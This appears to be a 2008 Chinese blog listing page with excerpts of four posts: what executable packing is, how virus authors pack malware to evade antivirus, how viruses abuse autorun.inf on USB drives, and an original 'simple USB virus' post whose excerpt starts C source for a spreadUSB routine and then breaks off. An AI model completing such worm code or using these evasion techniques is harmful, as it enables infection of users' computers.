- 博客(4)
- 资源 (1)
- 收藏
- 关注
RSS订阅转载 什么是加壳
加壳的全称应该是可执行程序资源压缩,是保护文件的常用手段. 加壳过的程序可以直接运行,但是不能查看源代码.要经过脱壳才可以查看源代码. 加壳:其实是利用特殊的算法,对EXE、DLL文件里的资源进行压缩。类似WINZIP 的效果,只不过这个压缩之后的文件,可以独立运行,解压过程完全隐蔽,都在内存中完成。 解压原理,是加壳工具在文件头里加了一段指令,告诉CPU,怎么才能
2008-08-06 17:00:00
1371
转载 加壳病毒
在好莱坞间谍电影里,那些特工们往往以神奇莫测的化妆来欺骗别人,甚至变换成另一个身份,国内对于这种伪装行为有个通俗的说法——“穿马甲”。而这种正与邪的争斗已经延伸到了病毒领域,很多病毒作者通过给病毒“穿马甲”、甚至穿多个“马甲”的方式,躲避杀毒软件的查杀,这种技术就是“加壳”。 病毒作者可以通过给老病毒加壳,大批量制造出杀毒软件无法识别的新病毒。 所谓加壳,是一种通过一系列数学运算,将
2008-08-06 16:57:00
849
转载 病毒利用autorun.inf做了什么
病毒作者可以利用autorun.inf的自动功能,让移动设备在用户系统完全不知情的情况下,“自动”执行任何命令或应用程序。因此,通过这个autorun.inf文件,可以放置正常的启动程序,如我们经常使用的各种教学光盘,一插入电脑就自动安装或自动演示;也可以通过此种方式,放置任何可能的恶意内容。 目前相关的U盘病毒的隐藏方式: 有了启动方法,病毒作者肯定需要将病毒主体放进光盘或者
2008-08-05 11:34:00
375
原创 一个很简单的U盘病毒
dmyww123@ 以下代码 仅供研究:#include #include #include #include char *drives[] = {"C:","D:","E","F:","G:","H:","I:","J:","K:","L:"}; char Path[MAX_PATH];DWORD WINAPI spreadUSB(
2008-08-01 20:16:00
877
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人